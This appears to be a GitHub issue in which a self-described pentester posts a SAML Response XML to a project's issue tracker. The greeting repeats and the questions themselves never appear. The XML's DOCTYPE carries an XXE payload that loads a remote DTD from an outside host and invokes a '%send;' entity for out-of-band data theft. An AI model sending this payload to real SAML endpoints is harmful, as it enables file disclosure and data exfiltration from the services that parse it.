Open abrahack opened 3 years ago
Hello,
Please I came across this awesome project of yours while pentesting, I have some questions ?
<?xml version="1.0"?> <!DOCTYPE data [<!ENTITY % remote SYSTEM "http://ping.local.com/foo"> %remote; %send;]> <samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" Destination="http://localhost:9000/saml/acs/" ID="_b4e5466d30d343a39b281c89699558dd" InResponseTo="_d155a38534a04be181c9b8a9aae1b5e8" IssueInstant="2021-05-09T21:54:51.309039+00:00" Version="2.0"> <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">http://localhost:8000/saml/metadata.xml</saml:Issuer> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> ... </ds:Signature> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_79630753cb3f44158e5cae1849045bf3" IssueInstant="2021-05-09T21:54:51.309039+00:00" Version="2.0"> <saml:Issuer>http://localhost:8000/saml/metadata.xml</saml:Issuer> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> ... </ds:Signature> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:2.0:nameid-format:email" SPNameQualifier="http://localhost:9000/saml/metadata.xml">example@example.com</saml:NameID> <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"> <saml:SubjectConfirmationData InResponseTo="_d155a38534a04be181c9b8a9aae1b5e8" NotOnOrAfter="2021-05-09T22:09:51.309039+00:00" Recipient="http://localhost:9000/saml/acs/"/> </saml:SubjectConfirmation> </saml:Subject> <saml:Conditions NotBefore="2021-05-09T21:51:51.309039+00:00" NotOnOrAfter="2021-05-09T22:09:51.309039+00:00"> <saml:AudienceRestriction> <saml:Audience>http://localhost:9000/saml/metadata.xml</saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement AuthnInstant="2021-05-09T21:54:51.309039+00:00"> <saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef> </saml:AuthnContext> </saml:AuthnStatement> <saml:AttributeStatement> <saml:Attribute Name="foo" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"> <saml:AttributeValue>bar</saml:AttributeValue> </saml:Attribute> </saml:AttributeStatement> </saml:Assertion> </samlp:Response>
Thanks for your help in the near future. Regards, @abrahack.
Hello,
Please I came across this awesome project of yours while pentesting, I have some questions ?
Thanks for your help in the near future. Regards, @abrahack.